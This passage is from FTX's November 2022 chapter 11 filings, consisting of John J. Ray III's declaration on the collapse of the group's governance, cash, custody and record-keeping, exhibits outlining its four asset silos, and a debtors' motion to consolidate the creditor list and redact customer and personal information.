(b)    **Alameda Silo:  Matthew R. Rosenberg**:  Mr. Rosenberg is a Partner at Lincoln Park Advisors, a financial advisory firm that he founded in 2014. He has more than 25 years of restructuring, corporate finance, principal investing, operating and board experience. Prior to founding Lincoln Park Advisors, he was a partner at the restructuring and investment banking firm Chilmark Partners, a partner in two private equity funds, the Zell/Chilmark Fund and Chilmark Fund II, the Chief Restructuring Officer of The Wellbridge Company and a member of multiple corporate boards. His restructuring advisory experience includes such companies as OSG, Supermedia, Nortel, Trinity Coal, USG Corporation, JHT Holdings, Inc., Covanta Energy, Sirva, Lodgian, Inc., ContiGroup Companies, Inc., Fruit of the Loom, Ltd. and Recycled Paper Greetings.

(c)    **Ventures Silo:  Rishi Jain:**  Mr. Jain is a Managing Director and Co-Head of the Western Region of Accordion, a financial and technology consulting firm focused on the private equity industry. He has more than 25 years of experience supporting management teams and leading finance and operations initiatives in both stressed and distressed environments. Prior to joining Accordion, Mr. Jain was part of Alvarez & Marsal's corporate restructuring and turnaround practice for over 10 years and served in a variety of senior financial operating roles. His most notable assignments have included helping lead the restructuring, liquidation and wind down of Washington Mutual and its predecessor entity, WMI Liquidating Trust. He also navigated the restructuring of Global Geophysical Services in its chapter 11 and eventually the liquidation and wind down in its second chapter 11 filing.

(d)    **Dotcom Silo:  The Honorable Joseph J. Farnan (Lead Independent Director):**  Mr. Farnan served as a United States District Judge for the District of Delaware from 1985 to 2010. He served as Chief Judge from 1997-2001. During his tenure, Mr. Farnan presided over numerous bench and jury trials involving complex commercial disputes. Prior to his appointment to the federal bench, Mr. Farnan was appointed to several positions in local, state and the federal government returning to private practice in 2010 with the formation of Farnan LLP, a law firm focused on complex commercial matters, including chapter 11 proceedings, securities litigation, antitrust litigation and patent litigation. Additionally, Mr. Farnan serves as an arbitrator, mediator, independent director and trustee of businesses contemplating or filing chapter 11 bankruptcy.

(e)    **Dotcom Silo:  Matthew A. Doheny:**  Mr. Doheny is President of North Country Capital LLC, an advisory and investment firm focused on challenging advisory assignments and investing private investment portfolios in special situation opportunities. He has held this position since January 2011. Mr. Doheny has served on the board of directors or as Chief Restructuring Officer of numerous stressed and distressed companies, including Yellow Corp., MatlinPatterson, GMAC Rescap and Eastman

-17-

Kodak. He was also Managing Director and Head of Special Situations Investing at HSBC Securities Inc. from 2015 to 2017. Previously, Mr. Doheny served as Portfolio Manager in Special Situations at Fintech Advisory Inc. from 2008 to 2010 and as Managing Director of the Distressed Products Group at Deutsche Bank Securities Inc. from 2000 to 2008.

48.     The appointment of the Directors will provide the FTX Group with appropriate corporate governance for the first time.

49.     The Directors intend to hold joint board meetings of the Debtors on matters of common interest, including (a) the implementation of controls, (b) asset protection and recovery, (c) the investigation into claims against the founders and third parties, (d) cooperation with insolvency proceedings of subsidiary companies in other jurisdictions and (e) the maximization of value for all stakeholders through the eventual reorganization or sale of the Debtors' complex array of businesses, investments and property around the world.  The Directors will implement appropriate procedures for the resolution of any conflicts of interest among the Silos and, if necessary, within the Silos as the case progresses, including the potential engagement of independent counsel to represent various Debtors in the resolution of intercompany claims against other Debtors.  I expect there to be a multitude of intercompany claims that will benefit from fair resolution under the rules and conventions of U.S. chapter 11 practice in the District of Delaware for complex, multi-Debtor cases.  For the time being, my belief is that all stakeholders are best served by a coordinated and centralized administration.

### B.     <u>Cash Management</u>

50.     The FTX Group did not maintain centralized control of its cash.  Cash management procedural failures included the absence of an accurate list of bank accounts and account signatories, as well as insufficient attention to the creditworthiness of banking partners

-18-

**A0018**

around the world. Under my direction, the Debtors are establishing a centralized cash management system with proper controls and reporting mechanisms.

51.     During these Chapter 11 Cases, cash that the Debtors are able to locate and transfer to the United States without adverse consequences, including substantially all proceeds of the global reorganization effort, will be deposited into financial institutions in the United States that are approved depository institutions in accordance with the U.S. Trustee Guidelines. Each Silo will have a centralized cash pool, and the Debtors will implement appropriate arrangements for allocating costs across the various Silos and Debtors. The Debtors expect to file promptly a Cash Management Motion that will describe the new cash management system in more detail.

52.     Because of historical cash management failures, the Debtors do not yet know the exact amount of cash that the FTX Group held as of the Petition Date. The Debtors are working with Alvarez & Marsal to verify all cash positions. To date, it has been possible to approximate the following balances as of the Petition Date based on available books and records:

| Entity | Unrestricted Cash | Custodial Cash | Other Restricted Cash | Total Cash |
|---|---|---|---|---|
| **_Debtor Entities_** | | | | |
| FTX EU Ltd | $1,250,848 | $47,925,646 | $175,832 | $49,352,327 |
| West Realm Shires Services Inc. | $32,233,606 | $14,596,119 | $1,270,700 | $48,100,425 |
| West Realm Shires Inc. | $35,411,619 | - | - | $35,411,619 |
| Paper Bird Inc | $7,906,893 | - | - | $7,906,893 |
| FTX Exchange FZE | $1,812,563 | - | $4,000,000 | $5,812,563 |
| Ledger Holdings Inc. | $4,098,480 | - | - | $4,098,480 |
| FTX TURKEY TEKNOLOJİ VE TİCARET ANONİM ŞİRKET | $36,682 | $3,069,526 | - | $3,106,208 |
| FTX Europe AG | $2,979,584 | - | - | $2,979,584 |
| FTX Trading Ltd | $375,726 | $2,600,324 | - | $2,976,050 |
| Maclaurin Investments Ltd. | $2,529,814 | - | - | $2,529,814 |
| Blockfolio, Inc. | $2,396,067 | - | - | $2,396,067 |
| Ledger Prime LLC | $2,230,765 | - | - | $2,230,765 |
| Crypto Bahamas LLC | $900,000 | - | - | $900,000 |
| FTX Ventures Ltd | $779,542 | - | - | $779,542 |
| West Realm Shires Financial Services Inc. | $576,831 | - | - | $576,831 |
| FTX Lend Inc. | $484,738 | - | - | $484,738 |
| FTX Trading GmbH | $146,059 | - | - | $146,059 |
| FTX Switzerland GmbH | $16,799 | - | - | $16,799 |

-19-

**A0019**

| Entity | Unrestricted Cash | Custodial Cash | Other Restricted Cash | Total Cash |
|---|---|---|---|---|
| **Total Debtor Entities** | **$96,166,614** | **$68,191,615** | **$5,446,532** | **$169,804,762** |
| *Non-Debtor Entities* | | | | |
| LedgerX LLC | $13,644,269 | $24,103,085 | $265,603,056 | $303,350,409 |
| FTX Digital Markets Ltd | - | - | $49,999,600 | $49,999,600 |
| Embed Clearing LLC. | - | - | $29,978,776 | $29,978,776 |
| FTX Philanthropy Inc | $10,877,387 | - | - | $10,877,387 |
| Embed Financial Technologies Inc | $395,371 | - | - | $395,371 |
| **Total Non-Debtor Entities** | **$24,917,027** | **$24,103,085** | **$345,581,432** | **$394,601,543** |
| **Total** | **$121,083,641** | **$92,294,700** | **$351,027,964** | **$564,406,305** |

53.     The Debtors have been in contact with banking institutions that they believe hold or may hold Debtor cash.  These banking institutions have been instructed to freeze withdrawals and alerted not to accept instructions from Mr. Bankman-Fried or other signatories. Proper signature authority and reporting systems are expected to be arranged shortly.

54.     Effective cash management also requires liquidity forecasting, which I understand was also generally absent from the FTX Group historically.  The Debtors are putting in place the systems and processes necessary for Alvarez & Marsal to produce a reliable cash forecast as well as the cash reporting required for Monthly Operating Reports under the Bankruptcy Code.

## C.     Financial Reporting

55.     The FTX Group received audit opinions on consolidated financial statements for two of the Silos – the WRS Silo and the Dotcom Silo – for the period ended December 31, 2021.  The audit firm for the WRS Silo, Armanino LLP, was a firm with which I am professionally familiar.  The audit firm for the Dotcom Silo was Prager Metis, a firm with which I am not familiar and whose website indicates that they are the "first-ever CPA firm to officially open its Metaverse headquarters in the metaverse platform Decentraland."[4]

---

[4]     https://pragermetis.com/news/prager-metis-opens-first-ever-cpa-firm-metaverse/.

56.     I have substantial concerns as to the information presented in these audited financial statements, especially with respect to the Dotcom Silo.  As a practical matter, I do not believe it appropriate for stakeholders or the Court to rely on the audited financial statements as a reliable indication of the financial circumstances of these Silos.

57.     The Debtors have not yet been able to locate any audited financial statements with respect to the Alameda Silo or the Ventures Silo.

58.     The Debtors are locating and securing all available financial records but expect it will be some time before reliable historical financial statements can be prepared for the FTX Group with which I am comfortable as Chief Executive Officer.  The Debtors do not have an accounting department and outsource this function.

## D.     <u>Human Resources</u>

59.     The FTX Group's approach to human resources combined employees of various entities and outside contractors, with unclear records and lines of responsibility.  At this time, the Debtors have been unable to prepare a complete list of *who* worked for the FTX Group as of the Petition Date, or the terms of their employment.  Repeated attempts to locate certain presumed employees to confirm their status have been unsuccessful to date.

60.     Nevertheless, there is a core team of dedicated employees at the FTX Group who have stayed focused on their jobs during this crisis and with whom I have established appropriate lines of authority and working relationships.  The Debtors continue to review personnel issues but I expect, based on my experience and the nature of the Debtors' business, that a large number of employees of the Debtors will need to continue to work for the Debtors for the foreseeable future in order to establish accountability, preserve value and maximize stakeholder recoveries after the departure of Mr. Bankman-Fried.  As Chief Executive Officer, I am thankful for the extraordinary efforts of this group of employees, who despite difficult

-21-

personal circumstances, have risen to the occasion and demonstrated their critical importance to the Debtors.

61.     The Debtors are preparing one or more motions to address issues relating to continuing employees and contractors.  The Debtors also may hire new employees and officers with turnaround or other relevant experience in core functions where I determine that new leadership is required.  I anticipate that the Debtors will be able to file these motions in the coming days.

### E.     <u>Disbursement Controls</u>

62.     The Debtors did not have the type of disbursement controls that I believe are appropriate for a business enterprise.  For example, employees of the FTX Group submitted payment requests through an on-line 'chat' platform where a disparate group of supervisors approved disbursements by responding with personalized emojis.

63.     In the Bahamas, I understand that corporate funds of the FTX Group were used to purchase homes and other personal items for employees and advisors.  I understand that there does not appear to be documentation for certain of these transactions as loans, and that certain real estate was recorded in the personal name of these employees and advisors on the records of the Bahamas.

64.     The Debtors now are implementing a centralized disbursement approval process that reports to me as Chief Executive Officer.

### F.     <u>Digital Asset Custody</u>

65.     The FTX Group did not keep appropriate books and records, or security controls, with respect to its digital assets.  Mr. Bankman-Fried and Mr. Wang controlled access to digital assets of the main businesses in the FTX Group (with the exception of LedgerX, regulated by the CFTC, and certain other regulated and/or licensed subsidiaries).  Unacceptable

-22-

management practices included the use of an unsecured group email account as the root user to access confidential private keys and critically sensitive data for the FTX Group companies around the world, the absence of daily reconciliation of positions on the blockchain, the use of software to conceal the misuse of customer funds, the secret exemption of Alameda from certain aspects of FTX.com's auto-liquidation protocol, and the absence of independent governance as between Alameda (owned 90% by Mr. Bankman-Fried and 10% by Mr. Wang) and the Dotcom Silo (in which third parties had invested).

66.     The Debtors have located and secured only a fraction of the digital assets of the FTX Group that they hope to recover in these Chapter 11 Cases.  The Debtors have secured in new cold wallets approximately $740 million of cryptocurrency that the Debtors believe is attributable to either the WRS, Alameda and/or Dotcom Silos.  The Debtors have not yet been able to determine how much of this cryptocurrency is allocable to each Silo, or even if such an allocation can be determined.  These balances exclude cryptocurrency not currently under the Debtors' control as a result of (a) at least $372 million of unauthorized transfers initiated on the Petition Date, during which time the Debtors immediately began moving cryptocurrency into cold storage to mitigate the risk to the remaining cryptocurrency that was accessible at the time, (b) the dilutive 'minting' of approximately $300 million in FTT tokens by an unauthorized source after the Petition Date and (c) the failure of the co-founders and potentially others to identify additional wallets believed to contain Debtor assets.

67.     In response, the Debtors have engaged forensic analysts to identify potential Debtor assets on the blockchain, cybersecurity professionals to identify the parties responsible for the unauthorized transactions on and after the Petition Date and investigators to begin the process of identifying what may be very substantial transfers of Debtor property in the

-23-

A0023

days, weeks and months prior to the Petition Date. The Debtors' team includes business, accounting, forensic, technical and legal resources that I believe are among the best in the world at these activities. It is my expectation that the Debtors will require assistance from the Court with respect to these matters as the investigation and these Chapter 11 Cases continue.

68.     Although the investigation has only begun and must run its course, it is my view based on the information obtained to date, that many of the employees of the FTX Group, including some of its senior executives, were not aware of the shortfalls or potential commingling of digital assets. Indeed, I believe some of the people most hurt by these events are current and former employees and executives, whose personal investments and reputations have suffered. These are many of the same people whose work will be necessary to ensure the maximization of value for all stakeholders going forward.

## G.     Custody of Other Assets and Investments

69.     The FTX Group had billions in investments other than cryptocurrency, as suggested above in the descriptions of the four Silos. However, the main companies in the Alameda Silo and the Ventures Silo did not keep complete books and records of their investments and activities.

70.     The Debtors are creating a balance sheet and other financial statements for the Alameda Silo and the Ventures Silo as of the Petition Date. The Debtors are doing so from the 'bottom-up' by using the records of cash transactions at the Debtors, and also are reviewing various third-party sources to locate investments.

## H.     Information and Retention of Documents

71.     One of the most pervasive failures of the FTX.com business in particular is the absence of lasting records of decision-making. Mr. Bankman-Fried often communicated

-24-

A0024

by using applications that were set to auto-delete after a short period of time, and encouraged employees to do the same.

72.     The Debtors are writing things down.  The investigative effort underway is led by myself and a team at Sullivan & Cromwell that reports directly to me, including a former Director of Enforcement at the SEC, a former Director of Enforcement at the CFTC, and a former Chief of the Complex Frauds and Cybercrime Unit of the United States Attorney's Office for the Southern District of New York.  I regard ensuring the comprehensiveness, professionalism and integrity of this investigation as an essential part of my job as Chief Executive Officer.

73.     Transparency with regulators around the world is an important objective for the Debtors.  Since Friday, the Debtors have been in contact with dozens of regulators throughout the United States and around the world, and will continue to be as these cases continue.

## I.     Regulated and Licensed Subsidiaries

74.     The FTX Group included regulated or licensed subsidiaries in many jurisdictions that may or may not have valuable going concern franchises.  The Debtors will soon be taking efforts to preserve these subsidiary businesses to the extent practicable under the circumstances.  The Debtors also are engaging a leading investment bank to assist the Debtors in valuing these businesses and potentially conducting sales efforts.

## J.     Access to Data

75.     The Debtors have cryptocurrency, digital assets and other critically sensitive data in repositories that have been the subject of unauthorized attempts to access.  The Debtors have implemented certain defensive measures.  The Debtors have been advised that attempts to access this property of the estate may create a risk of its loss to unauthorized persons.

-25-

The Debtors expect to seek special relief from the Court to authorize measures to access this information as safely as possible. The Debtors are unable to create a list of their top 50 creditors that includes customers without access to the data repositories at issue, and may seek related relief from the Court as well if the problem cannot be promptly resolved.

### K. Corporate Communications

76. Finally, and critically, the Debtors have made clear to employees and the public that Mr. Bankman-Fried is not employed by the Debtors and does not speak for them. Mr. Bankman-Fried, currently in the Bahamas, continues to make erratic and misleading public statements. Mr. Bankman-Fried, whose connections and financial holdings in the Bahamas remain unclear to me, recently stated to a reporter on Twitter: "F*** regulators they make everything worse" and suggested the next step for him was to "win a jurisdictional battle vs. Delaware".

I declare under penalty of perjury that the foregoing is true and correct.


Dated: November 17, 2022                    _/s/ John J. Ray III_____
                                                             Name: John J. Ray III
                                                             Title: Chief Executive Officer

-26-

**A0026**

## Exhibit A

**Summary of the Silos and Indicative Assets**

# FOUR SILOS FOR RECOVERY PURPOSES



## Sam Bankman-Fried

**Third Party Investors** — 22.25%

**Third Party Investors** — 25.0%

52.99% — 16.93%: Gary Wang — 7.83%: Nishad Singh

90.0% — 10.0%: Gary Wang

67.0% — 23.0%: Gary Wang — 10.0%: Nishad Singh

75.0%

**WRS SILO**
Independent Director: Mitchell Sonkin

**ALAMEDA SILO**
Independent Director: Matt Rosenberg

**VENTURES SILO**
Independent Director: Rishi Jain

**DOTCOM SILO**
Independent Directors: Judge Joseph Farnan and Matt Doheny

### Indicative Assets by Silo

**WRS SILO**
- Cash and Cash Equivalents
- Cryptocurrency
- FTX US
- LedgerX
- FTX Derivatives
- FTX Capital Markets
- Embed Clearing
- FTX Vault
- FTX Gaming
- FTX NFTs
- BlockFi Loans

**ALAMEDA SILO**
- Cash and Cash Equivalents
- Cryptocurrency
- Other Digital Assets
- Treasuries
- Crypto ETFs
- Venture Investments
  - *Genesis Digital Assets*
  - *Modulo Capital*
  - *Pionic (Toss)*
  - *Others*

**VENTURES SILO**
- Venture Investments
  - *Anthropic*
  - *K5*
  - *Dave Inc.*
  - *Sequoia Capital*
  - *Mysten Labs*
  - *Others*

**DOTCOM SILO**
- Cash and Cash Equivalents
- Cryptocurrency
- FTX.com
- Real Estate
- Licensed Subsidiaries in Non-US Jurisdictions

**Exhibit B**

**Preliminary Corporate Structure Chart**

# PRELIMINARY ORGANIZATIONAL CHART

Last updated: Draft of November 17, 2022



\* Percentages directly held by each of Sam Bankman-Fried, Gary Wang and Nishad Singh in individual entities varies.

\*\* Indicates non-operational subsidiary entity.

A0030

# IN THE UNITED STATES BANKRUPTCY COURT
## FOR THE DISTRICT OF DELAWARE

| | |
|---|---|
| In re: | Chapter 11 |
| FTX TRADING LTD., *et al.*,[1] | Case No. 22-11068 (JTD) |
| Debtors. | (Joint Administration Pending) |

**MOTION OF DEBTORS FOR ENTRY OF INTERIM AND FINAL ORDERS
(I) AUTHORIZING THE DEBTORS TO MAINTAIN A CONSOLIDATED
LIST OF CREDITORS IN LIEU OF SUBMITTING A SEPARATE MATRIX FOR
EACH DEBTOR, (II) AUTHORIZING THE DEBTORS TO REDACT
OR WITHHOLD CERTAIN CONFIDENTIAL INFORMATION OF
CUSTOMERS AND PERSONAL INFORMATION OF INDIVIDUALS AND
(III) GRANTING CERTAIN RELATED RELIEF**

FTX Trading Ltd. and its affiliated debtors and debtors-in-possession

(collectively, the "Debtors") hereby submit this motion (this "Motion") for entry of an interim

order, substantially in the form attached hereto as Exhibit A (the "Interim Order"), and a final

order, substantially in the form attached hereto as Exhibit B (the "Final Order" and together with

the Interim Order, the "Orders") pursuant to sections 105(a), 107 and 521 of title 11 of the

United States Code, 11 U.S.C. §§ 101 *et seq*. (the "Bankruptcy Code"), rules 1007, 2002 and

9018 of the Federal Rules of Bankruptcy Procedure (the "Bankruptcy Rules") and rules 1007-2

and 2002-1 of the Local Rules of Bankruptcy Practice and Procedure of the United States

Bankruptcy Court for the District of Delaware (the "Local Rules"), (a) authorizing the Debtors to

(i) maintain a consolidated list of creditors (the "Creditor Matrix") in lieu of submitting a

separate creditor matrix for each Debtor and (ii) redact or withhold certain confidential

information of customers and personal information of individuals, (b) establishing procedures for

---

[1] The last four digits of FTX Trading Ltd.'s tax identification number are 3288. Due to the large number of debtor entities in these Chapter 11 Cases, a complete list of the Debtors and the last four digits of their federal tax identification numbers is not provided herein. A complete list of such information may be obtained on the website of the Debtors' proposed claims and noticing agent at https://cases.ra.kroll.com/FTX.

{1368.002-W0069054.}

notifying the parties of the commencement of these chapter 11 cases (the "Chapter 11 Cases") and (c) granting certain related relief, including scheduling a hearing to consider approval of the Motion on a final basis (the "Final Hearing"). Certain facts supporting this Motion are set forth in the *Declaration of John J. Ray III in Support of Chapter 11 Petitions and First Day Pleadings* (the "Ray Declaration") and *Declaration of Edgar W. Mosley in Support of Chapter 11 Petitions and First Day Pleadings* (the "Mosley Declaration" and, together with the Ray Declaration, the "First Day Declarations"). In further support of the Motion, the Debtors respectfully state as follows:

## Background

1.      On November 11 and November 14, 2022 (as applicable, the "Petition Date"), the Debtors filed with the Court voluntary petitions for relief under chapter 11 of the Bankruptcy Code. The Debtors continue to operate their businesses and manage their properties as debtors-in-possession pursuant to sections 1107(a) and 1108 of the Bankruptcy Code. On November 14, 2022, the Debtors filed a motion with the Court pursuant to Bankruptcy Rule 1015 seeking joint administration of these Chapter 11 Cases. As of the date hereof, no creditors' committee, trustee or examiner has been appointed in these Chapter 11 Cases.

2.      Additional factual background relating to the Debtors' businesses and the commencement of these Chapter 11 Cases is set forth in the First Day Declarations.

## Jurisdiction

3.      The Court has jurisdiction to consider this Motion pursuant to 28 U.S.C. §§ 157 and 1334 and the *Amended Standing Order of Reference* from the United States District Court for the District of Delaware, dated February 29, 2012. This matter is a core proceeding pursuant to 28 U.S.C. § 157(b). Venue is proper in the Court pursuant to 28 U.S.C. §§ 1408 and 1409. The statutory predicates for the relief requested herein are sections 105, 107 and 521 of

the Bankruptcy Code, Bankruptcy Rules 1007 and 2002 and Local Rules 1007-2 and 2002-1. Pursuant to Local Rule 9013-1(f), the Debtors consent to the entry of a final order or judgment by the Court in connection with this Motion to the extent it is later determined that the Court, absent consent of the parties, cannot enter final orders or judgments consistent with Article III of the United States Constitution.

## Relief Requested

4.      By this Motion, the Debtors request entry of the Interim and Final Orders, substantially in the forms attached hereto as Exhibit A and Exhibit B, respectively, (a) authorizing the Debtors to (i) maintain the Creditor Matrix in lieu of submitting a separate creditor matrix for each Debtor and (ii) redact or withhold certain confidential information of customers and personal information of individuals, (b) establishing procedures for notifying the parties of the commencement of these Chapter 11 Cases and (c) granting related relief, including scheduling the Final Hearing.

## Basis for Relief

**I.      The Court May Authorize the Debtors to Maintain the Creditor Matrix in Lieu of Submitting a Formatted Mailing Matrix.**

5.      Bankruptcy Code section 521(a), Bankruptcy Rule 1007(a)(1) and Local Rule 1007-2 require a debtor in a voluntary chapter 11 case to file a list containing the name and complete address of each creditor (the "Creditor Matrix").  Additionally, Local Rule 2002-1(f)(v) requires that each Debtor, or its duly appointed claims agent, maintain "a separate claims register and separate creditor mailing matrix for each debtor in jointly administered cases."  Del. Bankr. L.R. 2002-1(f)(v).  Local Rule 1001-1(c) permits modifications of the Local Rules "in the interest of justice."  Del. Bankr. L.R. 1001-1(c).

6.      The Debtors request authority to file one consolidated Creditor Matrix for these Chapter 11 Cases in lieu of separate lists for each Debtor.  There are over one hundred

Debtors in these Chapter 11 Cases, many of which have overlapping creditors.  The exercise of
compiling separate creditor matrices for each individual Debtor would consume an excessive
amount of the Debtors' limited time and resources.  Compounding the problem here, as detailed
in the Ray Declaration, the Debtors historically did not keep appropriate books and records, and
the Debtors are currently working to access certain sources of data and records that are currently
unavailable.  (*See* Ray Decl. ¶¶ 3, 59, 71, 75.)  Creditor information, and in particular customer
information, is not clearly labeled or identifiable by Debtor.  As a result, presenting the
information on a consolidated basis will ensure the most relevant and known information can be
promptly disclosed.

       7.     Relatedly, because the Debtors have hundreds of thousands, if not over
one million, creditors and other parties-in-interest, converting the Debtors' computerized
information to a format compatible with the matrix requirements at the individual debtor level
would be a burdensome task and would greatly increase the risk of error with respect to
information on computer systems maintained by the Debtors or their agents.

       8.     Consistent with the Local Rules, the Debtors have filed an application
seeking to retain Kroll Restructuring Administration LLC as their claims and noticing agent (the
"Claims and Noticing Agent").  If such application is granted, the Claims and Noticing Agent
will, among other things:  (a) assist with compiling and maintaining the Creditor Matrix and
(b) complete the mailing or e-mailing, as applicable, of notices to the creditors on the Creditor
Matrix.[2]

---

[2]    On November 14, 2022, the Debtors filed the *Motion of Debtors for Entry of an Order (I) Modifying Certain
Creditor List Requirements; (II) Authorizing the Debtors to Serve Certain Parties By E-Mail; and
(III) Granting Related Relief* [D.I. 9] (the "Creditor List Motion"), pursuant to which the Debtors requested
authority to file one consolidated list of their top 50 creditors (the "Consolidated Top 50 Creditors List") in lieu
of a top 20 list for each Debtor and to serve certain parties by email.

9.      The Debtors, working with the Claims and Noticing Agent, are preparing the Creditor Matrix in electronic format.  To ensure that no parties-in-interest are prejudiced, the Debtors will make the Creditor Matrix available in readable electronic format to any party-in-interest who so requests (or in non-electronic format at such requesting party's sole cost and expense).

10.      Courts in this district have routinely granted relief similar to the relief requested herein.  *See, e.g.*, *In re Fast Radius, Inc.*, No. 22-11051 (JKS) (Nov. 9, 2022), D.I. 47 (authorizing the debtors to maintain a consolidated list of creditors in lieu of separate mailing matrices); *In re Vesta Holdings, LLC*, No. 22-11019 (LSS) (Nov. 1, 2022), D.I. 53 (same); *In re TPC Group Inc.*, No. 22-10493 (CTG) (June 3, 2022), D.I. 344 (same); *In re Gold Standard Baking, LLC*, No. 22-10559 (JKS) (June 23, 2022), D.I. 40 (same); *In re EYP Group Holdings*, No. 22-10367 (MFW) (Apr. 26, 2022), D.I. 38 (same); *In re Sequential Brands Group, Inc.*, No. 21-11194 (JTD) (Sept. 1, 2021), D.I. 65 (same); *In re Alex and Ani, LLC*, No. 21-10918 (CTG) (June 11, 2021), D.I. 62 (same); *In re Cred Inc.*, No. 20-12836 (JTD) (Nov. 10, 2020), D.I. 34 (same).

## II.      Cause Exists to Redact Certain Confidential Information of Customers Pursuant to Section 107(b)(1) of the Bankruptcy Code.

11.      Section 107(b)(1) of the Bankruptcy Code requires bankruptcy courts, on request of a party in interest, to "protect an entity with respect to a trade secret or confidential research, development, or commercial information." 11 U.S.C. §§ 107(b)(1).  Pursuant to Bankruptcy Rule 9018, upon motion, "the court may make any order which justice requires . . . to protect the estate or any entity in respect of a trade secret or other confidential research, development, or commercial information." Fed. R. Bankr. P. 9018.

12.      Accordingly, the Debtors respectfully submit that cause exists pursuant to section 107(b)(1) of the Bankruptcy Code to authorize the Debtors to redact from any paper filed

**A0035**

or to be filed with the Court or made publicly available in these Chapter 11 Cases, including the Creditor Matrix, Consolidated Top 50 Creditors List and Schedules and Statements,[3] the names and all associated identifying information of the Debtors' customers.  The Debtors operate a global financial-services platform catering to investors in various forms of cryptocurrency.  All of the Debtors' customers are creditors.  The Debtors' customer list, and related customer data, is an important and valuable asset of the Debtors and the Debtors maintain their customer list in strict confidence.

13.     These Chapter 11 Cases are in their infancy, and one of the core objectives identified by Mr. Ray is asset protection and recovery.  (Ray Decl. ¶ 6.)  Public dissemination of the Debtors' customer list could give the Debtors' competitors an unfair advantage to contact and poach those customers, and would interfere with the Debtors' ability to sell their assets and maximize value for their estates at the appropriate time.

14.     The Debtors will instruct the Claims and Noticing Agent to serve the individuals at their personal addresses or e-mail addresses, as applicable, ensuring that each individual creditor will receive the same notices in these Chapter 11 Cases as all other creditors without the potentially harmful disclosure of these details.  The Debtors also will also make the unredacted version of the Creditor Matrix, Consolidated Top 50 Creditor List, Schedules and Statements and any other applicable filings redacted pursuant to the proposed Orders available to the Court, the Office of the United States Trustee for the District of Delaware (the "U.S. Trustee") and counsel to any official committed appointed in these Chapter 11 Cases and, upon Court order, to any other party.

---

[3]     "Schedules and Statements" has the meaning assigned to it in the *Motion of Debtors for Entry of an Order (I) Extending Time to File (A) Schedules of Assets and Liabilities and Statements of Financial Affairs and (B) Rule 2015.3 Financial Reports and (II) Granting Certain Related Relief* [D.I. 26].

**A0036**

15.     This Court has granted debtors authority to redact both names and associated identifying information of a cryptocurrency lender's customers.  *See In re Cred Inc.*, No. 20-12836 (JTD) (Dec. 21, 2020), D.I. 264 (authorizing debtors to redact names, addresses and e-mail addresses of customers); *see also In re Voyager Digital Holdings, Inc.*, No. 22-10943 (MEW) (Bankr. S.D.N.Y. July 8, 2022), D.I. 112, 113 (authorizing debtor to redact the names of "Confidential Parties," including customers, from professional retention applications). Accordingly, the Debtors respectfully submit that cause exists to authorize the Debtors to redact from any paper filed or to be filed with the Court or made publicly available in these Chapter 11 Cases, the names, addresses and e-mail address of the Debtors' customers.

## III.     Cause Exists to Redact Certain Personally Identifiable Information of Creditors.

16.     Section 107(c) of the Bankruptcy Code provides that the Court:

> for cause, may protect an individual, with respect to the following types of information to the extent the court finds that disclosure of such information would create undue risk of identity theft or other unlawful injury to the individual or the individual's property:
>
> (A) Any means of identification . . . contained in a paper filed, or to be filed, in a case under [the Bankruptcy Code].
>
> (B) Other information contained in a paper described in subparagraph (A).

11 U.S.C. §§ 107(c)(1).

17.     Several courts in this and other districts have recently expounded on the importance of authorizing debtors to redact individual creditors' personally identifiable information.  In *In re Forever 21, Inc.*, in overruling an objection of the U.S. Trustee to the same redaction relief proposed here, Judge Gross noted that "[w]e live in a new age in which the theft of personal identification is a real risk, as is injury to persons who, for personal reasons, seek to have their addresses withheld."  *In re Forever 21, Inc.*, No. 19-12122 (KG) (Dec. 20, 2019), D.I.

605 (Dec. 19, 2019 Hr'g Tr. at 60:22–25). Similarly, in *In re Windstream Holdings, Inc.*, Judge

Drain noted that the consequences of releasing private information could be "very serious," and

"[o]nce [private information is] out there, it's out there." *In re Windstream Holdings, Inc.*, No.

19-22312 (RDD) (Bankr. S.D.N.Y. Mar. 25, 2019), D.I. 173 (Feb. 26, 2019 Hr'g Tr. at 88:6–12,

89:5–8).

18.     The risk related to disclosure is not merely speculative.  In at least one

recent chapter 11 case, the abusive former partner of a debtor's employee used the publicly

accessible creditor and employee information filed in the chapter 11 case to track the employee

at her new address, which had not been publicly available until then, forcing the employee to

change addresses again. *See In re Charming Charlie Holdings, Inc.*, No. 19-11534 (CSS)

(Jul. 11, 2019), D.I. 4 (describing incident which occurred during Charming Charlie's 2017

bankruptcy cases).  Other courts have since expressed serious privacy and safety concerns and

recognized that the threat to the individuals involved is real. *See In re Forever 21, Inc.*, No. 19-

12122 (KG) (Dec. 20, 2019), D.I. 605 (Dec. 19, 2019 Hr'g Tr. at 61:1–8) ("In addition, the

Court's concern with the disclosure of addresses is not speculative.  The Court, for example,

recently had a situation in which a former spouse in an abuse situation was able to locate his

former spouse through the creditors' matrix.  The Court has serious concerns with requiring

disclosure of home addresses of employees and the violation of privacy and safety concerns.

The threat to the employees is real.").

19.     In this case, the risk of identity theft or injury to innocent individual

creditors—customers and employees—of the Debtors outweighs the presumption in favor of

public access to judicial records and papers, or concerns of judicial efficiency. *See In re*

*Continental Airlines*, 150 B.R. 334, 340–41 (D. Del. 1993).  The amount of public and media

attention on these cases is enormous.  There is minimal, if any, benefit to the public disclosure of individual creditors' personal information or e-mail addresses in these Chapter 11 Cases.

20.     Additionally, the European General Data Protection Regulation (the "EU GDPR") and the United Kingdom Data Protection Act of 2018 (the "UK GDPR" and, together with the EU GDPR, the "GDPR"), which apply to all European Union member countries and the United Kingdom, and protect all European Union member countries' and the United Kingdoms' citizens, impose significant constraints on the disclosure of "personally identifiable information" (which includes the home addresses of individuals).  Violators of the GDPR risk severe penalties.[4]  The GDPR may apply to the Debtors as certain of the Debtors' creditors, interest holders, employees and/or contract workers may be individuals located in the United Kingdom or the European Union member countries.

21.     In light of this concern for privacy and GDPR compliance, courts in this district have routinely granted relief similar to the relief requested herein.  *See, e.g.*, *In re Mallinckrodt Plc,* Case No. 20-12522 (JTD) (Oct. 14, 2020), D.I. 221 (authorizing redaction of the home addresses of individuals and the names and address information of individuals protected by the GDPR); *In re Clover Technologies Group, LLC*, No. 19-12680 (KBO) (Feb. 4, 2020), D.I. 155 (same); *Anna Holdings, Inc.*, No. 19-12551 (CSS) (Dec. 3, 2019), D.I. 109 (authorizing redaction of the personally identifiable information of individual creditors and interest holders); *In re Charming Charlie Holdings Inc.*, Case No. 19-11534 (CSS) (Jul. 12, 2019), D.I. 74 (authorizing redaction of personal information of employees).

---

